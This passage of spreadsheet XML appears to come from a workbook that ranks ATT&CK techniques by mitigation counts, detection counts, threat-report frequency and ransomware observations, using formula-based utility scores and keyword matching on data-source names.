        <f>IF(AL360="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN360" s="52">
        <v>0</v>
      </c>
      <c r="AO360" s="51">
        <v>0</v>
      </c>
      <c r="AP360" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3959999999999999E-2</v>
      </c>
      <c r="AQ360" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.9866666666666669E-2</v>
      </c>
      <c r="AR360" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.9866666666666669E-2</v>
      </c>
      <c r="AS360" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT360" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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61" spans="1:47" ht="48">
      <c r="A361" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.7970000000000003E-2</v>
      </c>
      <c r="B361" s="25">
        <f>SUM(H361,M361,V361)*(1+SUM(AE361,AG361,AI361,AK361,AM361))</f>
        <v>0.17970000000000003</v>
      </c>
      <c r="C361" s="25" t="s">
        <v>1434</v>
      </c>
      <c r="D361" s="25" t="s">
        <v>1406</v>
      </c>
      <c r="E361" s="25" t="s">
        <v>1435</v>
      </c>
      <c r="F361" s="51">
        <v>1</v>
      </c>
      <c r="G361" s="51">
        <v>0</v>
      </c>
      <c r="H361" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I361">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J361">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K361">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L361">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M361" s="25">
        <v>0</v>
      </c>
      <c r="N361" s="51">
        <v>0</v>
      </c>
      <c r="O361" s="51">
        <v>0</v>
      </c>
      <c r="P361" s="51">
        <v>0</v>
      </c>
      <c r="Q361" s="51">
        <v>1</v>
      </c>
      <c r="R361" s="52" t="s">
        <v>1436</v>
      </c>
      <c r="S361" s="51">
        <v>2</v>
      </c>
      <c r="T361" s="52" t="s">
        <v>1382</v>
      </c>
      <c r="U361" s="51">
        <v>8</v>
      </c>
      <c r="V361" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="W361">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X361">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y361">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z361">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA361">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB361">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC361" s="29" t="s">
        <v>1437</v>
      </c>
      <c r="AD361" s="25" t="str" cm="1">
        <f t="array" ref="AD361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC361)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE361" s="25">
        <f>IF(AD361="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF361" s="25" t="str" cm="1">
        <f t="array" ref="AF361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC361)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG361" s="25">
        <f>IF(AF361="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH361" s="25" t="str" cm="1">
        <f t="array" ref="AH361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC361)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI361" s="25">
        <f>IF(AH361="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ361" s="25" t="str" cm="1">
        <f t="array" ref="AJ361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC361)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK361" s="25">
        <f>IF(AJ361="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL361" s="25" t="str" cm="1">
        <f t="array" ref="AL361">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC361)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM361" s="25">
        <f>IF(AL361="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN361" s="52">
        <v>0</v>
      </c>
      <c r="AO361" s="51">
        <v>0</v>
      </c>
      <c r="AP361" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.7970000000000003E-2</v>
      </c>
      <c r="AQ361" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.9900000000000009E-2</v>
      </c>
      <c r="AR361" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.9900000000000009E-2</v>
      </c>
      <c r="AS361" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT361" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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62" spans="1:47" ht="63.95">
      <c r="A362" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.5966666666666669E-2</v>
      </c>
      <c r="B362" s="25">
        <f>SUM(H362,M362,V362)*(1+SUM(AE362,AG362,AI362,AK362,AM362))</f>
        <v>0.25966666666666671</v>
      </c>
      <c r="C362" s="25" t="s">
        <v>1438</v>
      </c>
      <c r="D362" s="25" t="s">
        <v>1189</v>
      </c>
      <c r="E362" s="25" t="s">
        <v>1439</v>
      </c>
      <c r="F362" s="51">
        <v>1</v>
      </c>
      <c r="G362" s="51">
        <v>1</v>
      </c>
      <c r="H362" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I362">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J362">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K362">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L362">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M362" s="25">
        <v>0</v>
      </c>
      <c r="N362" s="51">
        <v>0</v>
      </c>
      <c r="O362" s="51">
        <v>0</v>
      </c>
      <c r="P362" s="51">
        <v>0</v>
      </c>
      <c r="Q362" s="51">
        <v>0</v>
      </c>
      <c r="R362" s="52" t="s">
        <v>1440</v>
      </c>
      <c r="S362" s="51">
        <v>6</v>
      </c>
      <c r="T362" s="52" t="s">
        <v>1441</v>
      </c>
      <c r="U362" s="51">
        <v>4</v>
      </c>
      <c r="V362" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095247E-2</v>
      </c>
      <c r="W362">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X362">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y362">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z362">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA362">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB362">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC362" s="29" t="s">
        <v>1442</v>
      </c>
      <c r="AD362" s="25" t="str" cm="1">
        <f t="array" ref="AD362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC362)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE362" s="25">
        <f>IF(AD362="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF362" s="25" t="str" cm="1">
        <f t="array" ref="AF362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC362)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG362" s="25">
        <f>IF(AF362="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH362" s="25" t="str" cm="1">
        <f t="array" ref="AH362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC362)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI362" s="25">
        <f>IF(AH362="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ362" s="25" t="str" cm="1">
        <f t="array" ref="AJ362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC362)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK362" s="25">
        <f>IF(AJ362="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL362" s="25" t="str" cm="1">
        <f t="array" ref="AL362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC362)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM362" s="25">
        <f>IF(AL362="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN362" s="60">
        <v>0</v>
      </c>
      <c r="AO362" s="51">
        <v>0</v>
      </c>
      <c r="AP362" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.5966666666666669E-2</v>
      </c>
      <c r="AQ362" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.6555555555555566E-2</v>
      </c>
      <c r="AR362" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.6555555555555566E-2</v>
      </c>
      <c r="AS362" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT362" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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63" spans="1:47" ht="32.1">
      <c r="A363" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.1190476190476188E-2</v>
      </c>
      <c r="B363" s="25">
        <f>SUM(H363,M363,V363)*(1+SUM(AE363,AG363,AI363,AK363,AM363))</f>
        <v>0.14523809523809525</v>
      </c>
      <c r="C363" s="25" t="s">
        <v>1443</v>
      </c>
      <c r="D363" s="25" t="s">
        <v>1324</v>
      </c>
      <c r="E363" s="25" t="s">
        <v>1444</v>
      </c>
      <c r="F363" s="51">
        <v>0</v>
      </c>
      <c r="G363" s="51">
        <v>1</v>
      </c>
      <c r="H363" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I363">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J363">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K363">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L363">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M363" s="25">
        <v>0</v>
      </c>
      <c r="N363" s="51">
        <v>0</v>
      </c>
      <c r="O363" s="51">
        <v>0</v>
      </c>
      <c r="P363" s="51">
        <v>0</v>
      </c>
      <c r="Q363" s="51">
        <v>0</v>
      </c>
      <c r="R363" s="52" t="s">
        <v>1325</v>
      </c>
      <c r="S363" s="51">
        <v>3</v>
      </c>
      <c r="T363" s="52" t="s">
        <v>1445</v>
      </c>
      <c r="U363" s="51">
        <v>7</v>
      </c>
      <c r="V363" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095247E-2</v>
      </c>
      <c r="W363">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X363">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y363">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z363">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA363">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB363">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC363" s="29" t="s">
        <v>1326</v>
      </c>
      <c r="AD363" s="25" t="str" cm="1">
        <f t="array" ref="AD363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC363)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE363" s="25">
        <f>IF(AD363="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF363" s="25" t="str" cm="1">
        <f t="array" ref="AF363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC363)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG363" s="25">
        <f>IF(AF363="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH363" s="25" t="str" cm="1">
        <f t="array" ref="AH363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC363)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI363" s="25">
        <f>IF(AH363="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ363" s="25" t="str" cm="1">
        <f t="array" ref="AJ363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC363)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK363" s="25">
        <f>IF(AJ363="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL363" s="25" t="str" cm="1">
        <f t="array" ref="AL363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC363)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM363" s="25">
        <f>IF(AL363="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN363" s="52">
        <v>2</v>
      </c>
      <c r="AO363" s="51">
        <v>1</v>
      </c>
      <c r="AP363" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.1190476190476188E-2</v>
      </c>
      <c r="AQ363" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.8412698412698414E-2</v>
      </c>
      <c r="AR363" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.8412698412698414E-2</v>
      </c>
      <c r="AS363" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT363" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU36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64" spans="1:47" ht="48">
      <c r="A364" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.7399523809523809E-2</v>
      </c>
      <c r="B364" s="25">
        <f>SUM(H364,M364,V364)*(1+SUM(AE364,AG364,AI364,AK364,AM364))</f>
        <v>0.17399523809523809</v>
      </c>
      <c r="C364" s="25" t="s">
        <v>1446</v>
      </c>
      <c r="D364" s="25" t="s">
        <v>1406</v>
      </c>
      <c r="E364" s="25" t="s">
        <v>1447</v>
      </c>
      <c r="F364" s="51">
        <v>1</v>
      </c>
      <c r="G364" s="51">
        <v>0</v>
      </c>
      <c r="H364" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I364">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J364">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K364">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L364">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M364" s="25">
        <v>0</v>
      </c>
      <c r="N364" s="51">
        <v>0</v>
      </c>
      <c r="O364" s="51">
        <v>0</v>
      </c>
      <c r="P364" s="51">
        <v>0</v>
      </c>
      <c r="Q364" s="51">
        <v>0</v>
      </c>
      <c r="R364" s="52" t="s">
        <v>1436</v>
      </c>
      <c r="S364" s="51">
        <v>2</v>
      </c>
      <c r="T364" s="52" t="s">
        <v>1382</v>
      </c>
      <c r="U364" s="51">
        <v>8</v>
      </c>
      <c r="V364" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095247E-2</v>
      </c>
      <c r="W364">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X364">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y364">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z364">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA364">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB364">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC364" s="29" t="s">
        <v>1437</v>
      </c>
      <c r="AD364" s="25" t="str" cm="1">
        <f t="array" ref="AD364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC364)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE364" s="25">
        <f>IF(AD364="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF364" s="25" t="str" cm="1">
        <f t="array" ref="AF364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC364)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG364" s="25">
        <f>IF(AF364="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH364" s="25" t="str" cm="1">
        <f t="array" ref="AH364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC364)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI364" s="25">
        <f>IF(AH364="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ364" s="25" t="str" cm="1">
        <f t="array" ref="AJ364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC364)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK364" s="25">
        <f>IF(AJ364="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL364" s="25" t="str" cm="1">
        <f t="array" ref="AL364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC364)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM364" s="25">
        <f>IF(AL364="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN364" s="60">
        <v>0</v>
      </c>
      <c r="AO364" s="51">
        <v>0</v>
      </c>
      <c r="AP364" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.7399523809523809E-2</v>
      </c>
      <c r="AQ364" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.7998412698412695E-2</v>
      </c>
      <c r="AR364" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.7998412698412695E-2</v>
      </c>
      <c r="AS364" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT364" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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65" spans="1:47">
      <c r="A365" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3389523809523808E-2</v>
      </c>
      <c r="B365" s="25">
        <f>SUM(H365,M365,V365)*(1+SUM(AE365,AG365,AI365,AK365,AM365))</f>
        <v>0.23389523809523807</v>
      </c>
      <c r="C365" s="25" t="s">
        <v>1448</v>
      </c>
      <c r="D365" s="25" t="s">
        <v>1449</v>
      </c>
      <c r="E365" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F365" s="51">
        <v>1</v>
      </c>
      <c r="G365" s="51">
        <v>1</v>
      </c>
      <c r="H365" s="25">
